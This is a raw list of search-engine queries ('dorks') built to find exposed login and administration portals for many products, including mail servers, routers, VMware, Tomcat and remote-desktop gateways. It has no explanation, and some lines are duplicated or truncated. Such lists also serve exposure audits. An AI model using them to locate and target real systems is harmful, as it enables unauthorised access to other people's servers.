allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner
password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server
CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change
your password and user name. If new username is left
blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your
domain."
intext:"Master Account" "Domain Name" "Password"
inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password"
inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server
Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE"
inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to
provide login account information for *" | "Please
provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration"
"Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log
in! You will have to accept cookies in order to log in"
-demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please
enter your User ID and Password in the spaces provided
below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user
name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user
name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel"
intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms
-inurl:asternic -inurl:sip -intitle:ANNOUNCE
-inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the
SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index")
-dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com"
inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have
cookies enabled in order to log into the site." ext:php
OR ext:cgi
intitle:"Merak Mail Server Web Administration"
-ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise"
-inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service
and a language."
intitle:"oMail-admin Administration - Login"
-inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -script -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration"
-site:sourceforge.net
intitle:"php icalendar administration"
-site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin -
sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site
designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please
activate Javascript!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:"
inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for
authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login"
inurl:console
intitle:"Welcome Site/User Administrator" "Please select
the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N
Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite
inurl:admin
intitle:"XMail Web Administration Interface"
intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam
Application Login")|("Trackercam Remote")
-trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page |
inurl:sake.servlet
intitle:Group-Office "Enter your username and password
to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell,